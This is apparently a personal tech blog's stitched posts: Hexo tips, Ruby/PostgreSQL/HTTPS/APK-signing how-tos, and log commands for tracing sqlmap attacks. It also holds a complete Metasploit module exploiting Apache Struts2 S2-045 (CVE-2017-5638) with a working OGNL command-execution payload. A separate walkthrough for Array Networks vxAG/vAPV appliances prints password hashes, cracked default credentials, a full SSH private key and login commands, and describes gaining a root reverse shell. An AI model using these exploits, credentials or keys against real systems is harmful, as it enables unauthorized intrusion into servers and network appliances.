0x00 Create a new post/page

1
2

~# hexo new "Post Title"
~# hexo new page "Download"

0x01 Put codes blocks on your post

Use keyword tag codeblock and endcodeblock

1
2
3

{% codeblock lang:javascript %}
alert('Hello World!');
{% endcodeblock %}

Or just use three backquotes

1
2
3
4

\`\`\`[language] [title] [url] [link text]
code snippet
\`\`\`
#remove the \ before `

0x02 Insert images/links in your content

Images

1

{% img [class names] /path/to/image [width] [height] [title text [alt text]] %}

Links

1

{% link text url [external] [title] %}

0x03 Organize your posts resources

In _config.yml, set post_asset_folder as true

1

post_asset_folder: true

Then your _posts directory maybe such as this

1
2
3
4
5
6
7
8
9

root@debian:~/chorder.net/source# tree _posts/
_posts/
├── hello-world
│   └── 20180510.jpg
├── hello-world.md
├── hexo-start-up
└── hexo-start-up.md

2 directories, 3 files

You can directly include images from resources directory:

1

{% asset_img xxx.jpg ALT TITLE %}

0x04 Organize your post categories / tags

Your may want to organize your posts as different categories and tags.
First you need to define categories and tags directories in _config.yml, default is like this

1
2
3
4
5
6

# Directory
source_dir: source
public_dir: public
tag_dir: tags
archive_dir: archives
category_dir: categories

Then you can generate a new page to navigate the posts

1
2

~# hexo new page "categories"
~# hexo new page "tags"

After that, the tags and categories directory will being created in source:

1
2
3
4
5
6
7
8
9
10
11
12
13
14

root@debian:~/chorder.net/source# tree
.
├── categories
│   └── index.md
├── _posts
│   ├── hello-world
│   │   └── 20180510.jpg
│   ├── hello-world.md
│   ├── hexo-start-up
│   └── hexo-start-up.md
└── tags
    └── index.md

5 directories, 5 files

And on the next time when you creating a new post, you could statement the category and tags of your post,
on the head of post markdown file, just like:

1
2
3
4
5
6

---
title: 10 basic operations of Hexo
date: 2018-05-17 17:05:24
categories: default
tags: default
---

The archives of tags and categories will showing in the site automatically.

0x05 Publish pages on a simple local server

In your hexo directory, run

1

~# npm install hexo-server --save

Then start the server:

1

~# hexo server -p PORT

Or if your want publish static pages as an production envirement, you should first generate static files:

1

~# hexo generate

And then start the server as static mode, it will only deploy pages which included in public directory:

1

~# hexo server -s

0x06 Directly include code from resource

1

{% include_code [title] [lang:language] path/to/file %}

0x07 Insert a video from youtube / vimeo

1

{% youtube video_id %}

1

{% vimeo video_id %}

0x08 Quote an article / resource

1
2
3
4
5
6
7
8
9

# article
{% post_path slug %}
{% post_link slug [title] %}

# resource
{% asset_path slug %}
{% asset_img slug [title] %}
{% asset_link slug [title] %}

0x09 Sitemap & robots.txt

As for optimize your site with a better SEO, ensure you has create sitemap:

1
2
3
4

#for google sitemap, install this package
npm install hexo-generator-sitemap --save
#for baidu(China) sitemap, instal this package
npm install hexo-generator-baidu-sitemap --save

Over that, tell the spider what you have done, write this in your robots.txt, and save it at source directory:

1
2

Sitemap: http://YOUR DOMAIN/sitemap.xml
Sitemap: http://YOUR DOMAIN/baidusitemap.xml

Example robots.txt as mine:

1
2
3
4
5
6
7

User-agent: *
Allow: /
Allow: /archives/
Allow: /categories/
Allow: /tags/
Sitemap: https://chorder.net/sitemap.xml
Sitemap: https://chorder.net/baidusitemap.xml

You can see both above at:

Welcome to chorder.net, which is…

Somewhere for coding.

1
2
3

loop do
  puts "hello vistor"
end

Somewhere for learning.

Talk is cheap, show me the code.

Somewhere for sharing.

A new hexo blog, themed by alpha-dust(Jonathan Klughertz)

Somewhere for me.

A New Beginning.

by Chorder, May 10, 2018.

put it to your MSFPATH/modules/exploits/multi/http/
struts2_s2045_rce.rb:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87

require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking
  include Msf::Exploit::Remote::HttpClient


  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Apache Struts2 S2-045 Remote Code Execution Exploit(CVE-2017-5638)',
      'Description'    => %q{
          It is possible to perform a RCE attack with a malicious Content-Type value.If the Content-Type value isn't valid an exception is thrown which is then used to display an error message to a user.Discoverd By Nike.Zheng.
      },
      'Author'         => [ 'MSF Module: Chorder(http://chorder.net)'],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2017-5638']
        ],
      'Privileged'     => true,
      'Platform'      => %w{ linux win },
      'Arch'           => 'x86',
      'DefaultOptions' =>{
          'CMD' => 'whoami'
        },
      'Targets'        =>
        [
          ['Windows Universal',
            {
                'Arch' => ARCH_X86,
                'Platform' => 'win',
                'CmdStagerFlavor' => 'tftp'
            }
          ],
          ['Linux Universal',
            {
                'Arch' => ARCH_X86,
                'Platform' => 'linux'
            }
          ],
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Mar 06 2017'))
      
      register_options(
        [
          Opt::RPORT(8080),
          OptString.new('URI', [ true, 'The path to a struts application action ie. /struts2.action', ""]),
          OptString.new('CMD', [ true, 'Execute this command instead of using command stager', "" ])
        ], self.class)
  end


  def execute_command(cmd, opts = {})
    uri =   normalize_uri( datastore['URI'] )
    headers ={
        "Content-Type"=>"%{(#nike='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='"+cmd+"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"
    }
    data = '----------1529557865\r\n\Content-Disposition: form-data; name="file"; filename="test.txt"\r\n\000'
    print_status("Target URI: #{uri}")
    print_status("Attempting to execute: #{cmd}")

    resp = send_request_raw({
      'host'    => rhost,
      'port'    => rport,
      'uri'     => uri,
      'version' => '1.1',
      'method'  => 'POST',
      'headers' => headers,
      'data'    => data,
    }, 5)
    print_status( resp.body )
  end



  def exploit
    unless datastore['CMD'].blank?
      print_status("Executing Command...")
      execute_command(datastore['CMD'])
      return
    end
    handler
    
  end

end

错误详情：

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19

ruby-2.3.3 - #compiling.......................................................................-
Error running '__rvm_make -j4',
showing last 15 lines of /usr/local/rvm/log/1488041042_ruby-2.3.3/make.log
exts.mk:210: recipe for target 'ext/openssl/all' failed
make[1]: *** [ext/openssl/all] Error 2
make[1]: *** Waiting for unfinished jobs....
installing default nkf libraries
compiling objspace_dump.c
linking shared-object json/ext/generator.so
make[2]: Leaving directory '/usr/local/rvm/src/ruby-2.3.3/ext/json/generator'
linking shared-object objspace.so
make[2]: Leaving directory '/usr/local/rvm/src/ruby-2.3.3/ext/objspace'
linking shared-object nkf.so
make[2]: Leaving directory '/usr/local/rvm/src/ruby-2.3.3/ext/nkf'
make[1]: Leaving directory '/usr/local/rvm/src/ruby-2.3.3'
uncommon.mk:203: recipe for target 'build-ext' failed
make: *** [build-ext] Error 2
++ return 2
There has been an error while running make. Halting the installation.

查看/usr/local/rvm/log/1488041042_ruby-2.3.3/make.log发现是openssl版本过老导致的。

解决方案：
第一步：先安装用于rvm的openssl：

1

rvm pkg install openssl

第二步：编译安装ruby，指定openssl目录（我的是/usr/local/rvm/usr/）

1

rvm install ruby-2.3.3 --with-openssl-dir=/usr/local/rvm/usr/

PostgreSQL其实并不是一定需要通过端口来连接。
在PostgreSQL的配置中有一项是将PSQL配置成不开放端口,只使用Unix套接字的通信。

具体的内容，可以参考下国内PostgreSQL大神的博客：

https://github.com/digoal/blog/blob/master/201701/20170111_01.md

也就是，在postgresql.conf中，将监听的主机listen_address改成空，即可在不开启端口的情况下进行通信。
如果你的 unix_socket_directories 选项配置的路径是在/tmp，那么在postgresql运行后，你的/tmp下面将会有”.s.PGSQL.5432”这个文件（通过ls -a /tmp 可以查看到）。
如果在配置好listen_address和unix_socket_directories之后，重启postgresql服务，并且/tmp下的套接字文件存在，就说已经配置好。
这时在metasploit的database.yml文件中，配置host为/tmp，用户名和密码可以随便写，数据库名称就写metasploit的数据库。
然后再配置一下postgresql的”pg_hba.conf”文件，
在其中加入local all all trust
将所有来自本地unix域的请求设置为信任。就可以在不开端口的情况下在metasploit中使用postgresql了。

为了安全起见，还可以在
postgresql.conf中，将unix_socket_permissions改为0770，这样可以避免无关用户滥用这个unix接口。

不知原文出自哪里，如果您是作者，请私信我补充来源链接。

前言

记录一些排查常见日志的命令,方法wiki,欢迎补充(Markdown 语法)。

常用命令

1. 查找关键词并统计行数

   1	cat 2015_7_25_test_access.log | grep "sqlmap" | wc -l

2. 删除含有匹配字符的行

   1	sed -i '/Indy Library/d' 2015_7_25_test_access.log

3. 查找所有日志中的关键词

   1	find ./ -name "*.log" |xargs grep "sqlmap" |wc -l

4. 获取特殊行(如id)并且排序统计

   1	cat cszl988.log | awk '{print $1}' | awk -F : '{print $2}' | sort -u | wc -l

5. 正则匹配内容(如提取ip)

   1	grep -E -o "([0-9]{1,3}[\.]){3}[0-9]{1,3}"

6. 去重并统计数量

   1	tail 3.log | awk '{print $7}' | sort | uniq -c

7. 批量提取(全流量中)数据包并且过滤数据

   1 2 3 4 5

   #!/bin/bash for file in ` ls $1 ` do parse_pcap -vvb $file | grep -v "Host:" | grep -v "Cookie:" | grep -v "User-Agent:" | grep -v "Accept:" | grep -v "Accept:" | grep -v "Accept-Language:" | grep -v "Accept-Encoding:" | grep -v "Connection:" | grep -v "Content-Type:" | grep -v "Content-Length" | grep -v "Server" done

8. url 解码

   1	cat luban.log | grep sqlmap | awk '{print $7}' | xargs python -c 'import sys, urllib; print urllib.unquote(sys.argv[1])'

9. 欢迎补充….

示范:xxxx站注入日志排查

• 查看所有sqlmap注入记录条数

  1 2	[root@pentest temp]# cat luban.log | grep sqlmap | wc -l 1241

• 预览几条url

  1 2 3 4 5 6 7 8 9 10 11 12 13

  cat luban.log | grep sqlmap | awk '{print $7}' | more /news.php?id=771%28.%28%22%29.%27%29%29%27&fid=168 /news.php?id=771%27IddP%3C%27%22%3EvCBw&fid=168 /news.php?id=771%29%20AND%201148%3D8887%20AND%20%288975%3D8975&fid=168 /news.php?id=771%29%20AND%208790%3D8790%20AND%20%287928%3D7928&fid=168 /news.php?id=771%20AND%204294%3D9647&fid=168 /news.php?id=771%20AND%208790%3D8790&fid=168 /news.php?id=771%27%29%20AND%205983%3D7073%20AND%20%28%27UwRr%27%3D%27UwRr&fid=168 /news.php?id=771%27%29%20AND%208790%3D8790%20AND%20%28%27hwaT%27%3D%27hwaT&fid=168 /news.php?id=771%27%20AND%206578%3D7565%20AND%20%27EoTZ%27%3D%27EoTZ&fid=168 /news.php?id=771%27%20AND%208790%3D8790%20AND%20%27lBdL%27%3D%27lBdL&fid=168 /news.php?id=771%25%27%20AND%205177%3D1107%20AND%20%27%25%27%3D%27&fid=168 /news.php?id=771%25%27%20AND%208790%3D8790%20AND%20%27%25%27%3D%27&fid=168

• 方便查看 urldecode

  1 2 3 4 5 6 7

  cat luban.log | grep sqlmap | awk '{print $7}' | xargs python -c 'import sys, urllib; print urllib.unquote(sys.argv[1])' /news.php?id=771&fid=168 /news.php?id=771&fid=168 AND ASCII(SUBSTRING((SELECT DISTINCT(COALESCE(CAST(schemaname AS CHARACTER(10000)),(CHR(32)))) FROM pg_tables OFFSET 1 LIMIT 1)::text FROM 3 FOR 1))> 97 /news.php?id=771&fid=168 UNION ALL SELECT NULL,(CHR(113)||CHR(122)||CHR(106)||CHR(120)||CHR(113))||(CHR(103)||CHR(75)||CHR(78)||CHR(87)||CHR(76)||CHR(74)||CHR(110)||CHR(1 15)||CHR(100)||CHR(85))||(CHR(113)||CHR(122)||CHR(120)||CHR(113)||CHR(113)),NULL,NULL,NULL,NULL,NULL,NULL,NULL UNION ALL SELECT NULL,(CHR(113)||CHR(122)||CHR(106)||CHR(120)||CHR(113))||(CHR(113)||CHR(71)||C HR(74)||CHR(82)||CHR(101)||CHR(120)||CHR(69)||CHR(112)||CHR(117)||CHR(79))||(CHR(113)||CHR(122)||CHR(120)||CHR(113)||CHR(113)),NULL,NULL,NULL,NULL,NULL,NULL,NULL--

https://startssl.com 这个网站可以给我们免费提供可信任的https证书，这里简单介绍一下配置的过程。
首先服务器需要安装openssl和apache的mod_ssl.so模块，并且需要在httpd.conf中开启这个模块。
完成上述操作之后就可以使用openssl生成你自己的证书了。
这里有些知识你需要了解一下。
https的整个服务中，你需要了解这些文件的作用：

server.key 服务器的私钥
server.crt 服务器的证书文件
server.csr 服务器证书请求文件
root.crt   根证书

这些文件是这样生成的

首先运行

1

openssl req -new -nodes -keyout chorder.net.key -out chorder.net.csr

生成服务器证书和服务器证书请求文件，过程中会要求输入很多有关证书的信息和密码。
这一步完成之后会生成两个文件，chorder.net.key和chorder.net.csr
这时候去startssl网站上注册帐号，然后提交自己生成的.csr文件，让startssl为你生成一个
服务器证书和根证书。
把两个.crt结尾的证书拷贝到服务器的/etc/pki/tls/certs/下，把.key和.csr文件拷贝到/etc/pki/tls/private/下。（只针对CentOS服务器，其他服务器请自行百度）。
另外还需要将/etc/pki/tls/下的cert.pem（如果没有则创建一个）链接指向到/etc/pki/tls/certs/root.crt
这样用火狐浏览器访问的时候才不会报 SEC_ERROR_UNKNOWN_ISSUER 这个错误。
这个cert.pem就是证书链，只有当你的服务器证书包含在startssl网站的证书链中，客户端才会认为你的证书是可信的。

最后，修改两个文件。

1 /etc/httpd/conf.d/ssl.conf

在该文件中修改以下内容：

指定服务器证书

1

SSLCertificateFile /etc/pki/tls/certs/chorder.net.crt

指定服务器私钥

1

SSLCertificateKeyFile /etc/pki/tls/private/chorder.net.key

指定服务器证书链

1

SSLCertificateChainFile /etc/pki/tls/certs/root-bundle.crt

2 /etc/httpd/conf/httpd.conf

为你的主机（我这里是虚拟主机）创建配置

我的配置如下

NameVirtualHost *:443
<VirtualHost *:443>
    SSLEngine on
    SSLCertificateFile /etc/pki/tls/certs/chorder.net.crt
    SSLCertificateKeyFile /etc/pki/tls/private/chorder.net.key
    SSLCertificateChainFile /etc/pki/tls/cert.pem
    ServerName chorder.net
    ServerAdmin ×××××
    DocumentRoot ×××××
    ErrorLog ×××××
    CustomLog ×××××
</VirtualHost>

其实就是http配置文件下多加了几行。
配置好这些以后，重启服务，完成。
另外，如果你希望访问你的域名直接跳转到https端口，可以写一段js来跳转，如果觉得
写代码太麻烦，可以在根目录的.htaccess文件中加入这两行来帮你自动跳转:

1
2

RewriteCond %{SERVER_PORT} !^443$
RewriteRule (.*) https://%{SERVER_NAME}/$1 [R]

这样就将默认端口指定为443,并且将所有http的请求重写为https.

这是一个比较老的漏洞了，但是到目前为止仍然有不少厂商在使用这个版本的设备。在渗透中也曾经遇到过。
参考自：https://www.exploit-db.com/exploits/32369/

受影响的产品有: Array Networks vxAG 9.2.0.34 and vAPV 8.3.2.17 appliances

默认用户和密码

vxAG 9.2.0.34 和 vAPV 8.3.2.17 的/etc/master.passwd 文件中包含了默认用户和密码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33

$ cat /etc/master.passwd
# $FreeBSD: src/etc/master.passwd,v 1.40 2005/06/06 20:19:56 brooks Exp $
#
root:$1$9QkJT4Y5$lF2BPaSI2kPlcrqz89yZv0:0:0::0:0:Charlie &:/root:/bin/csh
toor:*:0:0::0:0:Bourne-again Superuser:/root:
daemon:*:1:1::0:0:Owner of many system processes:/root:/usr/sbin/nologin
operator:*:2:5::0:0:System &:/:/usr/sbin/nologin
bin:*:3:7::0:0:Binaries Commands and Source:/:/usr/sbin/nologin
tty:*:4:65533::0:0:Tty Sandbox:/:/usr/sbin/nologin
kmem:*:5:65533::0:0:KMem Sandbox:/:/usr/sbin/nologin
games:*:7:13::0:0:Games pseudo-user:/usr/games:/usr/sbin/nologin
news:*:8:8::0:0:News Subsystem:/:/usr/sbin/nologin
man:*:9:9::0:0:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
sshd:*:22:22::0:0:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
smmsp:*:25:25::0:0:Sendmail Submission
User:/var/spool/clientmqueue:/usr/sbin/nologin
mailnull:*:26:26::0:0:Sendmail Default
User:/var/spool/mqueue:/usr/sbin/nologin
bind:*:53:53::0:0:Bind Sandbox:/:/usr/sbin/nologin
proxy:*:62:62::0:0:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin
_pflogd:*:64:64::0:0:pflogd privsep user:/var/empty:/usr/sbin/nologin
_dhcp:*:65:65::0:0:dhcp programs:/var/empty:/usr/sbin/nologin
uucp:*:66:66::0:0:UUCP
pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
pop:*:68:6::0:0:Post Office Owner:/nonexistent:/usr/sbin/nologin
www:*:80:80::0:0:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
nobody:*:65534:65534::0:0:Unprivileged user:/nonexistent:/usr/sbin/nologin
test:$1$UtEw8DNY$te4MRasnXgETxWOZ9Z1o10:1002:1002::0:0:test:/export/test:/bin/tcsh
sync:$1$bmfGRJPh$lWnesbn8M8xZNo3uaqfEd1:1005:0::0:0:sync:/export/sync:/bin/sh
recovery::65533:0::0:0:Recovery User:/:/ca/bin/recovery
mfg:$1$i8SV4bKc$lNMeb8Yow.p.cZvWxt1mO1:1013:1010::0:0:mfg:/export/mfg:/bin/tcsh
arraydb:*:1015:0::0:0:User &:/home/arraydb:/bin/sh
array::1016:1011::0:0:User &:/:/ca/bin/ca_shell

破解之后可以得到下列用户和密码:

1
2

用户: mfg 密码: mfg
用户: sync 密码: click1

test和root用户没破解出来。

其中sync用户默认可以远程登录:

1
2
3
4

$ssh sync@192.168.2.55 /bin/sh
sync@192.168.2.55's password:
$id
uid=1005(sync) gid=0(wheel) groups=0(wheel)

SSH 私钥

sync 用户使用了位于 “~/.ssh/id_dsa” 的登录私钥:

1
2
3
4
5
6
7
8
9
10
11
12
13

$ cat id_dsa
-----BEGIN DSA PRIVATE KEY-----
MIIBugIBAAKBgQCUw7F/vKJT2Xsq+fIPVxNC/Dyk+dN9DWQT5RO56eIQasd+h6Fm
q1qtQrJ/DOe3VjfUrSm7NN5NoIGOrGCSuQFthFmq+9Lpt6WIykB4mau5iE5orbKM
xTfyu8LtntoikYKrlMB+UrmKDidvZ+7oWiC14imT+Px/3Q7naj0UmOrSTwIVAO25
Yf3SYNtTYv8yzaV+X9yNr/AfAoGADAcEh2bdsrDhwhXtVi1L3cFQx1KpN0B07JLr
gJzJcDLUrwmlMUmrXR2obDGfVQh46EFMeo/k3IESw2zJUS58FJW+sKZ4noSwRZPq
mpBnERKpLOTcWMxUyV8ETsz+9oz71YEMjmR1qvNYAopXf5Yy+4Zq3bgqmMMQyM+K
O1PdlCkCgYBmhSl9CVPgVMv1xO8DAHVhM1huIIK8mNFrzMJz+JXzBx81ms1kWSeQ
OC/nraaXFTBlqiQsvB8tzr4xZdbaI/QzVLKNAF5C8BJ4ScNlTIx1aZJwyMil8Nzb
+0YAsw5Ja+bEZZvEVlAYnd10qRWrPeEY1txLMmX3wDa+JvJL7fmuBgIUZoXsJnzs
+sqSEhA35Le2kC4Y1/A=
-----END DSA PRIVATE KEY-----

下列文件位于 ~/.ssh 目录:

1
2
3
4
5
6
7
8
9

$ cat authorized_keys
1024 35
117781646131320088945310945996213112717535690524599971400605193647439008360689916421327587459429042579662784434303538942896683338584760112042194838342054595473085094045804963620754645364924583113650482968246287214031112796524662479539236259838315876244144983122361617319660444993650437402628793785173700484401
sync@AN

$ cat authorized_keys2
ssh-dss
AAAAB3NzaC1kc3MAAACBAJTDsX+8olPZeyr58g9XE0L8PKT5030NZBPlE7np4hBqx36HoWarWq1Csn8M57dWN9StKbs03k2ggY6sYJK5AW2EWar70um3pYjKQHiZq7mITmitsozFN/K7wu2e2iKRgquUwH5SuYoOJ29n7uhaILXiKZP4/H/dDudqPRSY6tJPAAAAFQDtuWH90mDbU2L/Ms2lfl/cja/wHwAAAIAMBwSHZt2ysOHCFe1WLUvdwVDHUqk3QHTskuuAnMlwMtSvCaUxSatdHahsMZ9VCHjoQUx6j+TcgRLDbMlRLnwUlb6wpniehLBFk+qakGcREqks5NxYzFTJXwROzP72jPvVgQyOZHWq81gCild/ljL7hmrduCqYwxDIz4o7U92UKQAAAIBmhSl9CVPgVMv1xO8DAHVhM1huIIK8mNFrzMJz+JXzBx81ms1kWSeQOC/nraaXFTBlqiQsvB8tzr4xZdbaI/QzVLKNAF5C8BJ4ScNlTIx1aZJwyMil8Nzb+0YAsw5Ja+bEZZvEVlAYnd10qRWrPeEY1txLMmX3wDa+JvJL7fmuBg==
sync@AN

如此一来就可以使用这个私钥进入系统:

将下面的id_dsa私钥保存在”synckey”文件中:

1
2
3
4
5
6
7
8
9
10
11
12
13
14

cat > ~/synckey << EOF
-----BEGIN DSA PRIVATE KEY-----
MIIBugIBAAKBgQCUw7F/vKJT2Xsq+fIPVxNC/Dyk+dN9DWQT5RO56eIQasd+h6Fm
q1qtQrJ/DOe3VjfUrSm7NN5NoIGOrGCSuQFthFmq+9Lpt6WIykB4mau5iE5orbKM
xTfyu8LtntoikYKrlMB+UrmKDidvZ+7oWiC14imT+Px/3Q7naj0UmOrSTwIVAO25
Yf3SYNtTYv8yzaV+X9yNr/AfAoGADAcEh2bdsrDhwhXtVi1L3cFQx1KpN0B07JLr
gJzJcDLUrwmlMUmrXR2obDGfVQh46EFMeo/k3IESw2zJUS58FJW+sKZ4noSwRZPq
mpBnERKpLOTcWMxUyV8ETsz+9oz71YEMjmR1qvNYAopXf5Yy+4Zq3bgqmMMQyM+K
O1PdlCkCgYBmhSl9CVPgVMv1xO8DAHVhM1huIIK8mNFrzMJz+JXzBx81ms1kWSeQ
OC/nraaXFTBlqiQsvB8tzr4xZdbaI/QzVLKNAF5C8BJ4ScNlTIx1aZJwyMil8Nzb
+0YAsw5Ja+bEZZvEVlAYnd10qRWrPeEY1txLMmX3wDa+JvJL7fmuBgIUZoXsJnzs
+sqSEhA35Le2kC4Y1/A=
-----END DSA PRIVATE KEY-----
EOF

修改synckey文件的权限:

1

chmod 600 ~/synckey

使用该私钥登录系统:

1

ssh -i ~/synckey sync@x.x.x.x /bin/sh

提权

/ca/bin/monitor.sh和 /ca/bin/debug_syn_stat默认是全局可写的 (权限为777).
在monitor.sh文件中写入脚本，通过debug monitor选项重新启动该脚本会以root权限运行。
使用sync用户运行/ca/bin/backend工具，使用如下方式重启debug monitor:
关闭debug monitor:

1

/ca/bin/backend -c "debug monitor off"`echo -e "\0374"`

开启debug monitor:

1

/ca/bin/backend -c "debug monitor on"`echo -e "\0374"`

在/ca/bin/monitor.sh中写入反弹shell的指令，通过上述操作，即可反弹回一个root shell.

首先，如果没有签名密钥，先生成密钥：

1

keytool -genkey -alias android.keystore -keyalg RSA -validity 20000 -keystore android.keystore

接着会提示你输入密码、地区、国家等等，根据提示输入即可。
我这里的用户名和密码都是android

然后使用密钥进行签名

1

jarsigner -keystore android.keystore -storepass android -keypass android XXX.apk android.keystore

keytool和jarsigner都是jdk自带的工具，配好环境变量就可以直接在命令行使用的。